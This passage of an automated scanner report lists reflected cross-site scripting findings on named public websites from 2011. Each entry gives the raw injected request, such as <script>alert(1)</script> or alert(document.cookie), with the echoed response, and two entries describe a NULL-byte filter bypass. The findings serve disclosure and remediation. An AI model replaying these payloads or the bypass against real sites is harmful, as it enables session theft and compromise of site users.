The value of the zoom request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2ceaa%3balert(1)//c7cc7a9b7c8 was submitted in the zoom parameter. This input was echoed as 2ceaa;alert(1)//c7cc7a9b7c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapserver.php?&intl=1&dist=9&zoom=122ceaa%3balert(1)//c7cc7a9b7c8&zip=&client=navy&city= HTTP/1.1 Host: www.branchmap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:05:59 GMT Server: Apache X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 11453
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<title>Navy Federal BranchMap</title> <head> <script t ...[SNIP]... '; var myzip=''; var mylat=''; var mylon=''; var clientid='navy'; var mynetworklist='vcom,coop,cashpoints,moneypass,keybank'; var maxlocations=parseInt(5); var sortstrict= '0'; var myzoom = parseInt(122ceaa;alert(1)//c7cc7a9b7c8); var maptype = ''; var mapwidth= '552'; var mapheight= '500'; var zoomfirst = ''; var myversion = 'v53'; var dedupeList = 'navy'; var drivingDir = ''; var noOriginPoint = ''; var disclaimer = ''; var ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c432</script><script>alert(1)</script>593046afd78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html4c432</script><script>alert(1)</script>593046afd78 HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 01:07:40 GMT Server: Apache/2.2.8 Set-Cookie: c2_user_state=4a49c31771737435e71c497a27a4ef68%3A0; path=/; domain=.care2.com Set-Cookie: c2_user_state=580b27568625e1c9c22011d9bba42f4c%3A0; path=/; domain=.care2.com X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 01:07:41 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:07:41 GMT; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Length: 76015
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.pageName="Care2 : Green Living : Channel : Bluefin-tuna-sells-for-396000.html4c432</script><script>alert(1)</script>593046afd78" s.server="www.care2.com" s.channel="Greenliving" s.pageType="" s.prop3="Greenliving" s.prop16="Unregistered" s.prop22="GL Channel : bluefin-tuna-sells-for-396000.html4c432</script> ...[SNIP]...
2.91. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.care2.com
Path:
/greenliving/bluefin-tuna-sells-for-396000.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3605</script><script>alert(1)</script>a13efd1020b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html?a3605</script><script>alert(1)</script>a13efd1020b=1 HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... <script type="text/javascript">
function loadCommentPage(page, numPerPage, itemID) { var sPath = '/greenliving/bluefin-tuna-sells-for-396000.html?a3605</script><script>alert(1)</script>a13efd1020b=1'; var charForQueryString = (sPath.indexOf("?") != -1) ? "&" : "?"; var servlet = charForQueryString + 'Care2CommentPageAJAX=1&page='+page+'&commentsPerPage='+numPerPage+'&itemID='+itemID;
...[SNIP]...
2.92. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.care2.com
Path:
/greenliving/bluefin-tuna-sells-for-396000.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9beb"><script>alert(1)</script>7188eebfdad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9beb\"><script>alert(1)</script>7188eebfdad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html?f9beb"><script>alert(1)</script>7188eebfdad=1 HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... <input type="hidden" name="pg" value="/greenliving/bluefin-tuna-sells-for-396000.html?f9beb\"><script>alert(1)</script>7188eebfdad=1#comment_form" /> ...[SNIP]...
2.93. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.care2.com
Path:
/greenliving/bluefin-tuna-sells-for-396000.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2fbf</script><script>alert(1)</script>5ef21547687 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /greenliving/bluefin-tuna-sells-for-396000.html?c2fbf</script><script>alert(1)</script>5ef21547687=1 HTTP/1.1 Host: www.care2.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml ...[SNIP]... -1555312', 'mouseover', function(){memberRollover.mem(this);;}); new CARE2.prime.PillManager('d9a3e6ff-1'); function onFacebookConnect() { var pg = "/greenliving/bluefin-tuna-sells-for-396000.html?c2fbf</script><script>alert(1)</script>5ef21547687=1" + "#comment_form"; C2FBConnect.onConnect(pg); } FB.init("dfc27a7e48d90111634fd0bbe8eb73d7", "/fb/xd_receiver.htm"); if($('newCommentForm')) {
var theForm = $('newCommentForm').getElementsB ...[SNIP]...
2.94. http://www.chasemilitary.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.chasemilitary.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8517f"%3balert(1)//55b2694a95c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8517f";alert(1)//55b2694a95c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?8517f"%3balert(1)//55b2694a95c=1 HTTP/1.1 Host: www.chasemilitary.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Set-Cookie: ARPT=OVMPLYS727Bec7OCKKLW; path=/ Cache-Control: private Content-Length: 68609 Content-Type: text/html; charset=utf-8 Set-Cookie: ASP.NET_SessionId=rehnjh55ru5bdbjfzqdu5vzl; path=/; HttpOnly Date: Wed, 02 Feb 2011 22:16:44 GMT Connection: close
The value of the ada request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab183"%3balert(1)//884aa7f60f1 was submitted in the ada parameter. This input was echoed as ab183";alert(1)//884aa7f60f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Default.aspx?ada=trueab183"%3balert(1)//884aa7f60f1 HTTP/1.1 Host: www.chasemilitary.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182020341.1296685136.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ARPT=OVMPLYSilkbyCKKWU; __utma=182020341.2094967643.1296685136.1296685136.1296685136.1; __utmc=182020341; __utmb=182020341.2.10.1296685136; ASP.NET_SessionId=jqii4q45b3tjcm45z5wnoz45;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68621 Content-Type: text/html; charset=utf-8 Date: Thu, 03 Feb 2011 01:06:45 GMT Connection: close
2.96. http://www.chasemilitary.com/Default.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.chasemilitary.com
Path:
/Default.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8d08"%3balert(1)//c9371ab82a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8d08";alert(1)//c9371ab82a8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Default.aspx?e8d08"%3balert(1)//c9371ab82a8=1 HTTP/1.1 Host: www.chasemilitary.com Proxy-Connection: keep-alive Referer: http://www.chasemilitary.com/?8517f%22%3balert(document.cookie)//55b2694a95c=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=OVMPLYSilkbyCKKWU; ASP.NET_SessionId=jqii4q45b3tjcm45z5wnoz45; __utmz=182020341.1296685136.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; __utma=182020341.2094967643.1296685136.1296685136.1296685136.1; __utmc=182020341; __utmb=182020341.1.10.1296685136
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68609 Content-Type: text/html; charset=utf-8 Date: Thu, 03 Feb 2011 00:07:27 GMT
The value of the hl request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bdade(a)d80aea01345 was submitted in the hl parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=ipboard+software&hl=enbdade(a)d80aea01345&prmd=ivns HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:09:09 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
2.98. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.google.com
Path:
/advanced_search
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f394a(a)d2919261fa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?f394a(a)d2919261fa0=1 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:08:40 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
The value of the prmd request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a960d(a)ecab87e67a8 was submitted in the prmd parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=ipboard+software&hl=en&prmd=ivnsa960d(a)ecab87e67a8 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:09:14 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4db85(a)700ed73b9bc was submitted in the q parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=ipboard+software4db85(a)700ed73b9bc&hl=en&prmd=ivns HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:09:05 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6e290(a)d4e0b417516 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images?q=ipboard+software6e290(a)d4e0b417516&um=1&ie=UTF-8&source=og&sa=N&hl=en&tab=wi HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:11:25 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
2.102. http://www.invisionpower.com/products/board/features/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.invisionpower.com
Path:
/products/board/features/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 95e51--><a>1fddadebe75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /products/board/features/?95e51--><a>1fddadebe75=1 HTTP/1.1 Host: www.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <!-- ?95e51--><a>1fddadebe75=1 --> ...[SNIP]...
2.103. http://www.invisionpower.com/products/nexus/features/store.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.invisionpower.com
Path:
/products/nexus/features/store.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5e722--><a>6ccf7c9b600 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /products/nexus/features/store.php?5e722--><a>6ccf7c9b600=1 HTTP/1.1 Host: www.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"> <hea ...[SNIP]... <!-- store?5e722--><a>6ccf7c9b600=1 --> ...[SNIP]...
2.104. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.jpost.com
Path:
/ArtsAndCulture/FoodAndWine/Article.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 41326><script>alert(1)</script>d2be1bfeaa9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ArtsAndCulture/FoodAndWine/Article.aspx?id=203979&41326><script>alert(1)</script>d2be1bfeaa9=1 HTTP/1.1 Host: www.jpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:17:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=sgl5a4ygdcxxmom2wnek3a45; path=/; HttpOnly Content-Type: text/html; charset=utf-8 Content-Length: 117507 Accept-Ranges: bytes Cache-Control: private, max-age=420 Age: 0 Expires: Thu, 03 Feb 2011 01:24:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head id="ctl00_He ...[SNIP]... <iframe src=http://www.facebook.com/plugins/like.php?href=http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx?id=203979&41326><script>alert(1)</script>d2be1bfeaa9=1&layout=button_count&show_faces=true&width=150&action=recommend&colorscheme=light&height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; h ...[SNIP]...
The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f639"><script>alert(1)</script>217975010b0 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?option=com_content&task=view&id=7&Itemid=133f639"><script>alert(1)</script>217975010b0 HTTP/1.1 Host: www.learningsolutions.com.hk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.106. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.macaudailytimes.com.mo
Path:
/times-lab/21109-Tragedy-our-Commons.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdaa0'-alert(1)-'045651d38d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(1)-'045651d38d6=1 HTTP/1.1 Host: www.macaudailytimes.com.mo Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
2.107. http://www.merrilledge.com/m/pages/self-directed-investing.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/self-directed-investing.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007604f"><script>alert(1)</script>840cc046a86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7604f"><script>alert(1)</script>840cc046a86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/self-directed-investing.aspx?%007604f"><script>alert(1)</script>840cc046a86=1 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0013948'%3bf91d272c668 was submitted in the src_cd parameter. This input was echoed as 13948';f91d272c668 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /m/pages/self-directed-investing.aspx?src_cd=BAC1%0013948'%3bf91d272c668 HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><!-- Thank you for using ...[SNIP]... <![CDATA[ var SPC = { 'Tactic' : 'BAC1.13948';f91d272c668' ,'Page' : 'self-directed-investing' ,'preview' : false }; //]]> ...[SNIP]...
2.109. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.merrilledge.com
Path:
/m/pages/zero-dollar-trades.aspx
Issue detail
